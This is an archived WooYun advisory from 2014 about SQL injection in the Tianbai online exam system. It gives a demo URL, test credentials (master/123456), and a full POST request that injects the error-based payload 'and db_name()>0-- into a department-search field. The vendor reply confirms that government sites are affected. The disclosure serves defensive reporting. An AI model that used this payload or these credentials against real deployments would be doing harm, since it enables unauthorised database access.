当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070604

漏洞标题:某在线考试系统SQL注入漏洞(demo测试)

相关厂商:天柏科技

漏洞作者: 路人甲

提交时间:2014-08-01 15:48

修复时间:2014-10-30 15:50

公开时间:2014-10-30 15:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-01: 细节已通知厂商并且等待厂商处理中
2014-08-06: 厂商已经确认,细节仅向厂商公开
2014-08-09: 细节向第三方安全合作伙伴开放
2014-09-30: 细节向核心白帽子及相关领域专家公开
2014-10-10: 细节向普通白帽子公开
2014-10-20: 细节向实习白帽子公开
2014-10-30: 细节向公众公开

简要描述:

某在线考试系统SQL注入

详细说明:

天柏在线考试系统
http://www.timber2005.com/
demo:
http://exam1.timber2005.com/default.aspx
测试账号:
master/123456
http://exam1.timber2005.com/system/Dep_Right.aspx

Dep_Info1_TreeView1_ExpandState=nnnennenennennenennnneeennennennennennennennn&Dep_Info1_TreeView1_SelectedNode=&__EVENTTARGET=&__EVENTARGUMENT=&Dep_Info1_TreeView1_PopulateLog=&__VIEWSTATE=%2FwEPDwULLTE4NTQ5MTU2MzIPZBYCAgMPZBYIAhUPDxYGHghDc3NDbGFzcwUIYnV0dG9uX2geB0VuYWJsZWRoHgRfIVNCAgJkZAIXDw8WBh8ABQhidXR0b25faB8BaB8CAgJkZAIZDw8WBh8ABQhidXR0b25faB8BaB8CAgJkZAIhD2QWAgIDDzwrAAkCAA8WBh4NTmV2ZXJFeHBhbmRlZGQeDFNlbGVjdGVkTm9kZWQeCUxhc3RJbmRleAItZAgUKwAUBVQwOjAsMDoxLDA6MiwwOjMsMDo0LDA6NSwwOjYsMDo3LDA6OCwwOjksMDoxMCwwOjExLDA6MTIsMDoxMywwOjE0LDA6MTUsMDoxNiwwOjE3LDA6MTgUKwACFggeBFRleHQFhQHlhZrlt6Xlp5Tlip7lhazlrqQ8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzM1Jywn5YWa5bel5aeU5Yqe5YWs5a6kJywnNCcpIj7pgInmi6k8L2E%2BHgVWYWx1ZQUCMzUeCEV4cGFuZGVkZx4MU2VsZWN0QWN0aW9uCyouU3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5UcmVlTm9kZVNlbGVjdEFjdGlvbgFkFCsAAhYIHwYFf%2Be7hOe7h%2BS6uuS6i%2BenkTxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnMzYnLCfnu4Tnu4fkurrkuovnp5EnLCczJykiPumAieaLqTwvYT4fBwUCMzYfCGcfCQsrBAFkFCsAAhYIHwYFf%2BWuo%2BS8oOe7n%2BaImOenkTxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnNTAnLCflrqPkvKDnu5%2FmiJjnp5EnLCcyJykiPumAieaLqTwvYT4fBwUCNTAfCGcfCQsrBAFkFCsAAhYIHwYFhQHnpL7kvJrnu7zlkIjlhZrlp5Q8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzUzJywn56S%2B5Lya57u85ZCI5YWa5aeUJywnMicpIj7pgInmi6k8L2E%2BHwcFAjUzHwhnHwkLKwQBFCsAAgUDMDowFCsAAhYIHwYFZ%2BWxsTxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnNTQnLCflsbEnLCcyJykiPumAieaLqTwvYT4fBwUCNTQfCGcfCQsrBAFkFCsAAhYIHwYFc%2Be6quW3peWnlDxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnNTUnLCfnuqrlt6Xlp5QnLCcyJykiPumAieaLqTwvYT4fBwUCNTUfCGcfCQsrBAFkFCsAAhYIHwYFeeebkeedo%2BmDqOmXqDxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnNTEnLCfnm5HnnaPpg6jpl6gnLCcyJykiPumAieaLqTwvYT4fBwUCNTEfCGcfCQsrBAEUKwACBQMwOjAUKwACFggfBgV555uR6ICD6ICB5biIPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCc1MicsJ%2BebkeiAg%2BiAgeW4iCcsJzInKSI%2B6YCJ5oupPC9hPh8HBQI1Mh8IZx8JCysEAWQUKwACFggfBgVz5Zui5bel5aeUPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCc0NycsJ%2BWbouW3peWnlCcsJzInKSI%2B6YCJ5oupPC9hPh8HBQI0Nx8IZx8JCysEARQrAAIFAzA6MBQrAAIWCB8GBXPlt6XkvZzlrqQ8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzQ5Jywn5bel5L2c5a6kJywnNCcpIj7pgInmi6k8L2E%2BHwcFAjQ5HwhnHwkLKwQBZBQrAAIWCB8GBW3lpofogZQ8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzM4Jywn5aaH6IGUJywnMicpIj7pgInmi6k8L2E%2BHwcFAjM4HwhnHwkLKwQBZBQrAAIWCB8GBX%2FooYzmlL%2Flip7lhazlrqQ8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzQyJywn6KGM5pS%2F5Yqe5YWs5a6kJywnMicpIj7pgInmi6k8L2E%2BHwcFAjQyHwhnHwkLKwQBFCsABQUPMDowLDA6MSwwOjIsMDozFCsAAhYIHwYFc%2Biwg%2BW6puWupDxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnNDMnLCfosIPluqblrqQnLCcyJykiPumAieaLqTwvYT4fBwUCNDMfCGcfCQsrBAFkFCsAAhYIHwYFc%2BS9nOS4mumYnzxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnNDQnLCfkvZzkuJrpmJ8nLCcyJykiPumAieaLqTwvYT4fBwUCNDQfCGcfCQsrBAFkFCsAAhYIHwYFdeWKnuWFrOWupDI8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzQ2Jywn5Yqe5YWs5a6kMicsJzMnKSI%2B6YCJ5oupPC9hPh8HBQI0Nh8IZx8JCysEARQrAAIFAzA6MBQrAAIWCB8GBXPmsLTnlLXotLk8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzQ4Jywn5rC055S16LS5JywnMycpIj7pgInmi6k8L2E%2BHwcFAjQ4HwhnHwkLKwQBZBQrAAIWCB8GBXXlip7lhazlrqQxPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCcxNycsJ%2BWKnuWFrOWupDEnLCczJykiPumAieaLqTwvYT4fBwUCMTcfCGcfCQsrBAEUKwACBQMwOjAUKwACFggfBgV55byA5Y%2BR5LiA6YOoPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCcyMCcsJ%2BW8gOWPkeS4gOmDqCcsJzInKSI%2B6YCJ5oupPC9hPh8HBQIyMB8IZx8JCysEAWQUKwACFggfBgV55YiG5YWs5Y%2B45LiJPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCcxOScsJ%2BWIhuWFrOWPuOS4iScsJzEnKSI%2B6YCJ5oupPC9hPh8HBQIxOR8IZx8JCysEAWQUKwACFggfBgV55YiG5YWs5Y%2B45LqMPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCcxOCcsJ%2BWIhuWFrOWPuOS6jCcsJzEnKSI%2B6YCJ5oupPC9hPh8HBQIxOB8IZx8JCysEAWQUKwACFggfBgVz56eR5oqA6YOoPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCc1OCcsJ%2BenkeaKgOmDqCcsJzEnKSI%2B6YCJ5oupPC9hPh8HBQI1OB8IZx8JCysEAWQUKwACFggfBgVy5oC757uP55CGPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCcxJywn5oC757uP55CGJywnMicpIj7pgInmi6k8L2E%2BHwcFATEfCGcfCQsrBAEUKwACBQMwOjAUKwACFggfBgVy5Yqe5YWs5a6kPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCc3Jywn5Yqe5YWs5a6kJywnMycpIj7pgInmi6k8L2E%2BHwcFATcfCGcfCQsrBAEUKwACBQMwOjAUKwACFggfBgVv5rWL6K%2BVMTxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnMjEnLCfmtYvor5UxJywnNCcpIj7pgInmi6k8L2E%2BHwcFAjIxHwhnHwkLKwQBFCsABAULMDowLDA6MSwwOjIUKwACFggfBgVv5rWL6K%2BVMjxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnMjInLCfmtYvor5UyJywnOScpIj7pgInmi6k8L2E%2BHwcFAjIyHwhnHwkLKwQBZBQrAAIWCB8GBW%2FmtYvor5UzPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCcyMycsJ%2Ba1i%2BivlTMnLCc3JykiPumAieaLqTwvYT4fBwUCMjMfCGcfCQsrBAFkFCsAAhYIHwYFb%2Ba1i%2BivlTQ8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzI0Jywn5rWL6K%2BVNCcsJzYnKSI%2B6YCJ5oupPC9hPh8HBQIyNB8IZx8JCysEARQrAAQFCzA6MCwwOjEsMDoyFCsAAhYIHwYFaWFhYWE8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzI3JywnYWFhYScsJzInKSI%2B6YCJ5oupPC9hPh8HBQIyNx8IZx8JCysEAWQUKwACFggfBgVpZGRkZDxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnMjYnLCdkZGRkJywnMicpIj7pgInmi6k8L2E%2BHwcFAjI2HwhnHwkLKwQBZBQrAAIWCB8GBWcxMjM8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzI1JywnMTIzJywnNycpIj7pgInmi6k8L2E%2BHwcFAjI1HwhnHwkLKwQBFCsAAgUDMDowFCsAAhYIHwYFZ3FxcTxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnMjgnLCdxcXEnLCc4JykiPumAieaLqTwvYT4fBwUCMjgfCGcfCQsrBAFkFCsAAhYIHwYFcui0ouWKoemDqDxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnMicsJ%2Bi0ouWKoemDqCcsJzEnKSI%2B6YCJ5oupPC9hPh8HBQEyHwhnHwkLKwQBZBQrAAIWCB8GBXLluILlnLrpg6g8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzMnLCfluILlnLrpg6gnLCcxJykiPumAieaLqTwvYT4fBwUBMx8IZx8JCysEARQrAAMFBzA6MCwwOjEUKwACFggfBgV45biC5Zy66LCD56CUPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCc4Jywn5biC5Zy66LCD56CUJywnMicpIj7pgInmi6k8L2E%2BHwcFATgfCGcfCQsrBAFkFCsAAhYIHwYFeOa2ieWkluWFrOWFszxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnOScsJ%2Ba2ieWkluWFrOWFsycsJzInKSI%2B6YCJ5oupPC9hPh8HBQE5HwhnHwkLKwQBZBQrAAIWCB8GBXLlrqLmiLfpg6g8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzQnLCflrqLmiLfpg6gnLCcxJykiPumAieaLqTwvYT4fBwUBNB8IZx8JCysEARQrAAMFBzA6MCwwOjEUKwACFggfBgV55bm%2F5ZGK5Lia5YqhPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCcxMCcsJ%2BW5v%2BWRiuS4muWKoScsJzQnKSI%2B6YCJ5oupPC9hPh8HBQIxMB8IZx8JCysEAWQUKwACFggfBgV55biC5Zy65oub5ZWGPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCcxMScsJ%2BW4guWcuuaLm%2BWVhicsJzInKSI%2B6YCJ5oupPC9hPh8HBQIxMR8IZx8JCysEAWQUKwACFggfBgVy5Yib5L2c6YOoPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCc1Jywn5Yib5L2c6YOoJywnMicpIj7pgInmi6k8L2E%2BHwcFATUfCGcfCQsrBAEUKwADBQcwOjAsMDoxFCsAAhYIHwYFeeihjOmUgOetluWIkjxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnMTInLCfooYzplIDnrZbliJInLCczJykiPumAieaLqTwvYT4fBwUCMTIfCGcfCQsrBAFkFCsAAhYIHwYFeeiuvuiuoeWIm%2BS9nDxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnMTMnLCforr7orqHliJvkvZwnLCcyJykiPumAieaLqTwvYT4fBwUCMTMfCGcfCQsrBAFkFCsAAhYIHwYFcuWqkuS7i%2BmDqDxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnNicsJ%2BWqkuS7i%2BmDqCcsJzEnKSI%2B6YCJ5oupPC9hPh8HBQE2HwhnHwkLKwQBFCsAAwUHMDowLDA6MRQrAAIWCB8GBXnlqpLkvZPku6PnkIY8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzE0Jywn5aqS5L2T5Luj55CGJywnMicpIj7pgInmi6k8L2E%2BHwcFAjE0HwhnHwkLKwQBZBQrAAIWCB8GBXnlvaLosaHljIXoo4U8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzE1Jywn5b2i6LGh5YyF6KOFJywnMScpIj7pgInmi6k8L2E%2BHwcFAjE1HwhnHwkLKwQBZBQrAAIWCB8GBX%2FotKjph4%2Fmo4Dpqozpg6g8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzQ1Jywn6LSo6YeP5qOA6aqM6YOoJywnMScpIj7pgInmi6k8L2E%2BHwcFAjQ1HwhnHwkLKwQBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFE0RlcF9JbmZvMSRUcmVlVmlldzFJqXp3qAF%2FjJs1wwfQ1wOD2x1hig%3D%3D&DEP_NAME2=+%27and+db_name%28%29%3E0--&search=%E6%9F%A5%E8%AF%A2&DEP_PNAME=%24%E6%A0%B9%E8%8A%82%E7%82%B9&DEP_NAME=&DEP_SORT=&DEP_MARK=&SORT=DEP_SORT&DEP_PID=&DEP_LEVEL=0&Dep_Info1%24SORT=DEP_SORT


选择组织机构-部门管理-输入: 'and db_name()>0--

部门管理.png

漏洞证明:

SQL注入.png


爆错注入

修复方案:

过滤参数

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-08-06 08:35

厂商回复:

CNVD确认所述情况,通过实例测试,确认有政府网站案例受影响,已经转由CNCERT下发给对应的分中心处置本省案例。

最新状态:

暂无